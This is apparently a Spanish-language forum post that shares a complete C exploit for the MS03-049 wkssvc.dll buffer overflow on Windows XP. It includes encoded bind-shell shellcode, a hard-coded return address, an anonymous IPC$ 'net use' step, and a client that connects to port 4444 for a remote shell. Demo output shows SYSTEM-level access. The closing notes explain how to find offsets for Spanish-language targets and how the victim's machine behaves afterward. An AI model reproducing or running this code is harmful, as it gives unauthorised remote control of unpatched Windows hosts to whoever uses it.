Exploit @
http://www.security.nnov.ru/files/ntctl-03-49.c
Devuelve una shell en el puerto 4444
Creo que está basado en el exploit 03-049 de Wirepair; la mayor parte del código coincide, solo que esta modificación de Firestorm añade más líneas.
#define ADDR 0x75133776
//`call edi' instruction ; tested winxpSP0ru,winxpSP1ru.
// ms03-049 wkksvc.dll buffer overflow exploit (winxp) modified by Firestorm
// + поддержка русского языка в шелле (Russian-language support in the shell)
#include <winsock2.h>
#include <windows.h>
#include <lm.h>
#include <winnls.h>
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <io.h>
#pragma comment(lib,"ws2_32.lib")
/* DEMO
D:\CBuilder6\PROJECTS\0349>ntctl-03-49.exe 127.1.1.1
Attacking: 127.1.1.1
net use \\127.1.1.1\ipc$ "" /user:""
Команда выполнена успешно. (= "The command completed successfully.")
Waiting 1s...
Connecting 127.1.1.1:4444...Connected to 127.1.1.1:4444!
Microsoft Windows XP [Версия 5.1.2600]
(С) Корпорация Майкрософт, 1985-2001.
D:\WINDOWS\system32>whoami
whoami
NT AUTHORITY\SYSTEM
D:\WINDOWS\system32>exit
exit
-> Connection closed...
*/
// Function-pointer type for the netapi32 entry point that ThreadFunc() resolves
// at run time with GetProcAddress("NetAddAlternateComputerName"). The parameter
// list mirrors that API (server, alternate name, account, password, reserved);
// the return type is declared VOID here, so the status code the real API
// returns is never examined by the caller.
typedef VOID (*MYPROC)(IN LPCWSTR Server OPTIONAL,
    IN LPCWSTR AlternateName,
    IN LPCWSTR DomainAccount OPTIONAL,
    IN LPCWSTR DomainAccountPassword OPTIONAL,
    IN ULONG Reserved
    );
char overwrite[2045] = "";
char sc[] =
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" //
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" //like nop
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" //
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x90"
//'call edi' here
"\xeb\x19\x5e\x31\xc9\x81\xe9\x89\xff"
"\xff\xff\x81\x36\x80\xbf\x32\x94\x81\xee\xfc\xff\xff\xff\xe2\xf2"
"\xeb\x05\xe8\xe2\xff\xff\xff\x03\x53\x06\x1f\x74\x57\x75\x95\x80"
"\xbf\xbb\x92\x7f\x89\x5a\x1a\xce\xb1\xde\x7c\xe1\xbe\x32\x94\x09"
"\xf9\x3a\x6b\xb6\xd7\x9f\x4d\x85\x71\xda\xc6\x81\xbf\x32\x1d\xc6"
"\xb3\x5a\xf8\xec\xbf\x32\xfc\xb3\x8d\x1c\xf0\xe8\xc8\x41\xa6\xdf"
"\xeb\xcd\xc2\x88\x36\x74\x90\x7f\x89\x5a\xe6\x7e\x0c\x24\x7c\xad"
"\xbe\x32\x94\x09\xf9\x22\x6b\xb6\xd7\x4c\x4c\x62\xcc\xda\x8a\x81"
"\xbf\x32\x1d\xc6\xab\xcd\xe2\x84\xd7\xf9\x79\x7c\x84\xda\x9a\x81"
"\xbf\x32\x1d\xc6\xa7\xcd\xe2\x84\xd7\xeb\x9d\x75\x12\xda\x6a\x80"
"\xbf\x32\x1d\xc6\xa3\xcd\xe2\x84\xd7\x96\x8e\xf0\x78\xda\x7a\x80"
"\xbf\x32\x1d\xc6\x9f\xcd\xe2\x84\xd7\x96\x39\xae\x56\xda\x4a\x80"
"\xbf\x32\x1d\xc6\x9b\xcd\xe2\x84\xd7\xd7\xdd\x06\xf6\xda\x5a\x80"
"\xbf\x32\x1d\xc6\x97\xcd\xe2\x84\xd7\xd5\xed\x46\xc6\xda\x2a\x80"
"\xbf\x32\x1d\xc6\x93\x01\x6b\x01\x53\xa2\x95\x80\xbf\x66\xfc\x81"
"\xbe\x32\x94\x7f\xe9\x2a\xc4\xd0\xef\x62\xd4\xd0\xff\x62\x6b\xd6"
"\xa3\xb9\x4c\xd7\xe8\x5a\x96\x80\xae\x6e\x1f\x4c\xd5\x24\xc5\xd3"
"\x40\x64\xb4\xd7\xec\xcd\xc2\xa4\xe8\x63\xc7\x7f\xe9\x1a\x1f\x50"
"\xd7\x57\xec\xe5\xbf\x5a\xf7\xed\xdb\x1c\x1d\xe6\x8f\xb1\x78\xd4"
"\x32\x0e\xb0\xb3\x7f\x01\x5d\x03\x7e\x27\x3f\x62\x42\xf4\xd0\xa4"
"\xaf\x76\x6a\xc4\x9b\x0f\x1d\xd4\x9b\x7a\x1d\xd4\x9b\x7e\x1d\xd4"
"\x9b\x62\x19\xc4\x9b\x22\xc0\xd0\xee\x63\xc5\xea\xbe\x63\xc5\x7f"
"\xc9\x02\xc5\x7f\xe9\x22\x1f\x4c\xd5\xcd\x6b\xb1\x40\x64\x98\x0b"
"\x77\x65\x6b\xd6\x93\xcd\xc2\x94\xea\x64\xf0\x21\x8f\x32\x94\x80"
"\x3a\xf2\xec\x8c\x34\x72\x98\x0b\xcf\x2e\x39\x0b\xd7\x3a\x7f\x89"
"\x34\x72\xa0\x0b\x17\x8a\x94\x80\xbf\xb9\x51\xde\xe2\xf0\x90\x80"
"\xec\x67\xc2\xd7\x34\x5e\xb0\x98\x34\x77\xa8\x0b\xeb\x37\xec\x83"
"\x6a\xb9\xde\x98\x34\x68\xb4\x83\x62\xd1\xa6\xc9\x34\x06\x1f\x83"
"\x4a\x01\x6b\x7c\x8c\xf2\x38\xba\x7b\x46\x93\x41\x70\x3f\x97\x78"
"\x54\xc0\xaf\xfc\x9b\x26\xe1\x61\x34\x68\xb0\x83\x62\x54\x1f\x8c"
"\xf4\xb9\xce\x9c\xbc\xef\x1f\x84\x34\x31\x51\x6b\xbd\x01\x54\x0b"
"\x6a\x6d\xca\xdd\xe4\xf0\x90\x80\x2f\xa2\x04";
// ---- File-scope state shared between main() and ThreadFunc() ----
// Everything without an initialiser is zero-initialised (C static storage).
char netuse[100];                              // "net use \\host\ipc$ ..." command line built in main() and passed to system()
char exp_buf[2045+4+16+(sizeof sc)];           // request buffer assembled in ThreadFunc() (see the memset/memcpy sequence there)
char ip[30];                                   // "\\host" (UNC form of argv[1]), written by _snprintf in ThreadFunc()
LPWSTR ipl[60];                                // wide-character copy of ip; declared as an array of 60 pointers but used as a WCHAR buffer through casts
DWORD calledi = ADDR;                          // 4-byte value copied into exp_buf at offset 2044 (see ADDR and the 'call edi' comment at the top)
LPWSTR unicodesp0[(2045+4+16+(sizeof sc))*2];  // exp_buf converted with MultiByteToWideChar(CP_ACP); same pointer-array-as-buffer pattern as ipl
char unicode[(2045+4+16+(sizeof sc))*2];       // exp_buf widened by hand (each byte followed by 0x00) in ThreadFunc()
int i = 0;                                     // loop counters for the interleave loop in ThreadFunc()
int x = 0;
int len = 0;                                   // not referenced anywhere in this file
HINSTANCE hinstLib;                            // handle from LoadLibrary("netapi32.dll")
MYPROC ProcAddr;                               // NetAddAlternateComputerName as resolved by GetProcAddress
char *host;                                    // argv[1]: the target host name or address, used without any validation
int SP;                                        // unused; the atoi(argv[2]) assignment in main() is commented out
// Worker thread started by main(): fills the file-scope request buffers and
// passes them to NetAddAlternateComputerName for the host named in argv[1].
// lpParam (a pointer to dwThrdParam in main()) is never read. The thread
// finishes through ExitThread(0), so the DWORD return value is never produced.
DWORD WINAPI ThreadFunc( LPVOID lpParam )
{
    // asm int 3;
    // ip is a 30-byte zero-initialised global, so the 24-byte bound leaves it
    // NUL-terminated even when host is long enough to be truncated.
    _snprintf(ip, 24, "\\\\%s", host);
    hinstLib = LoadLibrary("netapi32.dll");
    // Assemble exp_buf from the filler bytes, the ADDR value and sc; every offset is hard-coded.
    memset(overwrite, 0x41, 2000);
    memset(overwrite+2000, 0x90, 44);
    memcpy(exp_buf, overwrite, 2044);
    memcpy(exp_buf+2044, &calledi, 4);
    memset(exp_buf+2048, 0x90, 16);
    memcpy(exp_buf+2064, sc, sizeof(sc));
    // Widened copy #1: raw interleave, each byte of exp_buf followed by 0x00.
    // NOTE: the loop condition is `<=`, so the final iteration writes
    // unicode[sizeof(unicode)] and reads exp_buf[sizeof(exp_buf)] — both one
    // element past the end of their arrays (undefined behaviour).
    memset(unicode, 0x00, sizeof(unicode));
    for (x = 0, i = 0; i <= sizeof(unicode); x++, i+=2) unicode[i] = exp_buf[x];
    // Widened copy #2: converted through the active code page, so bytes >= 0x80
    // may come out differently from copy #1. The last argument is a byte count
    // although MultiByteToWideChar expects a count of wide characters (the
    // buffer is large enough that this does not overflow).
    MultiByteToWideChar(CP_ACP, NULL, exp_buf, sizeof(exp_buf), (unsigned short *)unicodesp0,sizeof(unicodesp0));
    MultiByteToWideChar(CP_ACP, NULL, ip, 30, (unsigned short*)ipl, 60);
    if (hinstLib != NULL)
    {
        ProcAddr = (MYPROC) GetProcAddress(hinstLib,"NetAddAlternateComputerName");
        if (NULL != ProcAddr)
        {
            // printf("\nGetProcAddr: %x\n", *ProcAddr);
            // Both widened copies are sent back to back; the return status of
            // each call is discarded (MYPROC is declared VOID).
            (ProcAddr)((LPCWSTR)ipl,(const unsigned short *)unicodesp0,NULL,NULL,0);
            (ProcAddr)((LPCWSTR)ipl,(const unsigned short *)unicode,NULL,NULL,0);
            // Author's note (translated from Russian): it was observed that a wrong
            // service-pack guess causes nothing unusual, so the SP0 and SP1 variants
            // are sent at the same time.
        }
        else printf("procaddr null\n");
        FreeLibrary(hinstLib);
    } else printf("hinst null\n");
    ExitThread(0);
}
/* Print the message on its own line and terminate the process with status 0.
 * Called by shell() on every connection or console error; never returns. */
void err_exit(char *s) {
    fputs(s, stdout);
    putchar('\n');
    exit(0);
}
// Interactive relay between the local console and the connected socket:
// data arriving on the socket is written to stdout, and console input is
// sent to the socket. Loops forever; every error path ends in err_exit(),
// so the function never returns to its caller.
void shell(int sock) {
    int l;
    char buf[512];
    struct timeval time;
    // Hand-built fd_set: {fd_count = 1, fd_array[0] = sock}. This relies on the
    // Winsock fd_set layout and on unsigned long, u_int and SOCKET all having
    // the same width, i.e. a 32-bit build.
    unsigned long ul[2];
    // 1 s poll interval; the struct is reused unchanged on every iteration.
    time.tv_sec=1;
    time.tv_usec=0;
    while (1) {
        ul[0]=1;
        ul[1]=sock;
        l=select(0,(fd_set *)&ul,NULL,NULL,&time);
        if(l==1) {
            // Socket readable: forward one chunk to stdout.
            l=recv(sock,buf,sizeof(buf),0);
            if (l<=0) {
                err_exit("-> Connection closed...\n");
            }
            l=write(1,buf,l);
            if (l<=0) {
                err_exit("-> Connection closed...\n");
            }
        }
        else {
            // Timeout (0) — or SOCKET_ERROR, which is not distinguished from a
            // timeout here — falls through to a blocking read on stdin.
            l=read(0,buf,sizeof(buf));
            if (l<=0) {
                err_exit("-> Connection closed...\n");
            }
            l=send(sock,buf,l,0);
            if (l<=0) {
                err_exit("-> Connection closed...\n");
            }
        }
    }
}
// Entry point. argv[1] names the target host. Sequence: run `net use` to open
// a null (anonymous) IPC$ session, start ThreadFunc() to send the request,
// wait a fixed second, then connect to TCP/4444 on the same host and hand the
// socket to shell().
int main(int argc, char **argv) {
    DWORD dwThreadId, dwThrdParam = 1;
    WSADATA tmp;
    struct hostent *he;
    struct sockaddr_in their_addr;
    int sockfd;
    if (argc < 2) {
        fprintf(stderr, "ms03-049 winxp wkksvc.dll buffer overflow exploit.\n");
        fprintf(stderr, "Usage: %s <ip>\n",argv[0]);
        exit(1);
    }
    // SP=atoi(argv[2]); //unused
    host=argv[1];
    printf("Attacking: %s\n",host);
    // &netuse has type char (*)[100], not char *; the address is the same so it
    // works, but it is a type mismatch. host is interpolated unquoted into a shell
    // command line with an unbounded sprintf into a 100-byte buffer: argv[1] is
    // trusted completely here, so this is command injection / overflow if the
    // argument ever comes from anywhere other than the operator's own command line.
    sprintf(&netuse,"net use \\\\%s\\ipc$ \"\" /user:\"\"",host);
    printf("%s\n",netuse);
    system(netuse);
    // dwThrdParam is handed to the thread but ThreadFunc() never reads it.
    CreateThread(NULL,0,ThreadFunc,&dwThrdParam,0,&dwThreadId);
    printf("Waiting 1s...");Sleep(1000);   // fixed delay rather than synchronising with the thread
    printf("\nConnecting %s:%d...",host,4444);
    WSAStartup (MAKEWORD(2,0),&tmp);       // return value unchecked
    he = gethostbyname(host);              // returns NULL on failure; dereferenced unchecked below
    their_addr.sin_family = AF_INET;
    their_addr.sin_addr = *((struct in_addr *)he->h_addr);
    their_addr.sin_port = htons(4444);
    sockfd=socket(AF_INET,SOCK_STREAM,0);  // INVALID_SOCKET not checked
    if(connect(sockfd,(struct sockaddr *)&their_addr, sizeof(struct sockaddr)) == -1)
    {
        printf("Couldnt connect to bindshell.\n");
        return(0);   // failure still reports exit status 0
    }
    printf("Connected to %s:%d!\n\n",host,4444);Sleep(100);
    shell(sockfd);   // never returns; the process ends inside err_exit()
    return(0);
}
Funciona en WIN XP sp0 perfectamente....
Pa sacar el offset en WinXP sp0, buscáis el call edi como indican los comentarios del codigo. Si lo hacéis con el findjmp, de toda la lista, encontraréis uno q varia en una cifra respecto al offset ruso del codigo, ese funciona. Por cierto, me estoy dando cuenta d q la mayoria de los offsets españoles varian solo en una cifra respecto a los rusos, eso ayuda a encontrarlos, supongo

Tambien vale q probéis con el offset sacado del jmp esp sobre wkssvc.dll, o al menos a mi me ha funcionao...
Nota: Al salir, el sistema remoto no se cuelga a menos q la victima ejecute cmd.exe. Entonces es cuando se cuelga...
